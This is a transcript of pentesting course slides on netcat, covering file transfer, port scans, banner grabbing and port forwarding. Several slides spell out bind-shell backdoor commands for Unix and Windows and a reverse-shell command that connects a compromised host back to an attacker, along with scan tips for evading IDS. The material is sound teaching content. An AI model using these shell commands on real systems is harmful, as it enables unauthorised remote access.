Presentation is loading. Please wait.

Presentation is loading. Please wait.

COMP265 - Pentesting netcat. What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard.

Similar presentations

Presentation on theme: "COMP265 - Pentesting netcat. What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard."— Presentation transcript:

1 COMP265 - Pentesting netcat

2 What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard output Low level Versatile “The network Swiss army knife”

3 Basic Operation Client mode: –Connects to specific remote port Listen mode: –Waits for connection on a port Both modes –Send Standard Input to net –Data from net sent to Standard Output Messages from netcat sent to standard Error Packets can have source routing attached

4 Netcat Command May be two letter command “nc” –Like cp and other traditional two letter unix commands –nc options hostname ports May be the word “netcat” Another variant “ncat”, from nmap project –Supports a few more options Depends on the platform, Kali has both Sometimes have to compile from source to get all options (Suse)

5 Command Options -llisten mode, for inbound connects -L"Listen harder" Persistent listener (Win only) -n numeric-only IP addresses, no DNS -p portlocal port number -rrandomize local and remote ports -s addrlocal source address -uUDP mode --sctp sctp mode -v verbose [use twice to be more verbose]

6 Command Options -i secsdelay interval for lines sent, ports scanned -tanswer TELNET negotiation -w secstimeout for connects and final net reads -z zero-I/O mode [used for scanning] These three options not available on some packages -o fileor -x file (hex) dump of traffic -e progor -c command program to exec after connect -g gatewaysource-routing hop point[s], up to 8

7 What for? Send files Telnet Backdoor Port scan Banner grabbing Reverse shell Relay (proxy) Port forward Replay

8 Arguments Host can be name or ip -n = no dns lookups, ip only otherwise full DNS forward and reverse lookup -v or -vv = verbose messages, always sent to standard error -w limits wait time, -w 3 recommended -o filename produces dump of all traffic > or < -i slows down sending, used if input from a file

9 Send Files Sender –nc -l -p 80 < file.txt –file.txt | nc -l -p 80 Reciever –nc 80 > file.txt Note use of redirect and pipe Receiver could have been a web browser | all enhance power of netcat

10 Another Example dd if=/dev/sda3 | gzip | nc -l 80 nc 80 > sda3.img.gz Or, listener can be receiver nc -w 3 -l 80 > /home.cmb.tar.gz tar -cvf - /home/cmb | gzip | nc 80

11 nc telnet cmblap:~ # telnet 25 Trying Connected to Escape character is '^]'. 220 ESMTP ^C ^] telnet> quit Connection closed. cmblap:~ # netcat 25 220 ESMTP helo 250 quit 221 cmblap:

12 As telnet client Netcat quits when you want it to Doesn't pay attention to standard input EOF Doesn't require escape character Less cruft Transfers arbitrary binary data Better utility for probing services Can use UDP -t responds automatically to telnet option negotiations

13 Probing? Netcat can do port scans This took around 1 sec cmblap:~ # netcat -v -w 2 -z 20-1000 [] 631 (ipp) open [] 445 (microsoft-ds) open [] 139 (netbios-ssn) open [] 111 (sunrpc) open [] 110 (pop3) open [] 80 (http) open [] 53 (domain) open [] 25 (smtp) open [] 24 (?) open [] 22 (ssh) open cmblap:~ #

14 UDP scans too These are much slower cmblap:~ # netcat -v -w 2 -z -u 20-100 [] 67 (bootps) open [] 53 (domain) open

15 Scanning Options -i –Delay interval to slow down scans -r –Randomise ports, including source -z –Send no data (TCP) or minimal data (UDP) -i and -r help to avoid ids -vv reports closed ports

16 Fancier Scan echo QUIT | nc -v -w 5 target-host 20-250 500-600 5990-7000

17 Banner Grabbing cmblap:~ # netcat -v 110 [] 110 (pop3) open +OK Hello there. quit +OK Better luck next time. cmblap:~ # netcat -v 25 [] 25 (smtp) open 220 ESMTP quit 221 cmblap:~ # netcat -v 22 [] 22 (ssh) open SSH-1.99-OpenSSH_4.1 quit Protocol mismatch.

18 Chat Session Just for fun Machine –nc -l -p 1234 Machine 2 –nc 1234 Both machine's keyboard input appears on the other machine's screen Note: use -v option to solve problems that may appear

19 Web Browser echo “GET” | nc address 80 > page.html

20 Backdoor By routing netcat's standard output to a command interpreter, we create a remote shell cmblap:/usr/local/src/netcat-0.7.1/src #./netcat -l -n -v -s -p 1234 -e /bin/sh Connection from cmblap:/usr/local/src/netcat-0.7.1/src # I had to dl and build to enable the -e switch Cannot pass parameters to program

21 On the other end pdlnx2:~ # netcat -v 1234 DNS fwd/rev mismatch: != cmblap [] 1234 (search-agent) open df Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda6 20641788 7448780 12144368 39% / udev 1540268 192 1540076 1% /dev /dev/sda2 39942856 8711724 31231132 22% /windows/C /dev/sda8 20650996 17395552 2206404 89% /home/cmb exit pdlnx2:~ #

22 More backdoors On windows: nc -L -p 1234 -d -e cmd.exe -L means listen hard –wait for connections –Not needed on unix -d means detach from process –Also not needed on linux

23 “Shoveling” a Shell Aka Reverse Shell Compromised machine cannot accept connections –Has to initiate connections because of firewall/NAT Attacker listens from outside the firewall –netcat -v -l -p 1234 Script on compromised machine starts shell then connects to attacker –netcat ip.addr 1234 -e /bin/sh Script has to run forever, or at timed intervals, or in response to some event

24 Port Forwarding Forwarding localhost port 8080 to remote host port 80 ncat -l localhost 8080 --sh-exec "ncat 80"

25 References ncat – –User's guide is good reference netcat – Don't forget the man pages

26 Lab Lab today will exercise many of these functions Due the day of the lab next week, Feb 18 –No new lab next week

Download ppt "COMP265 - Pentesting netcat. What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard."

Similar presentations

Ads by Google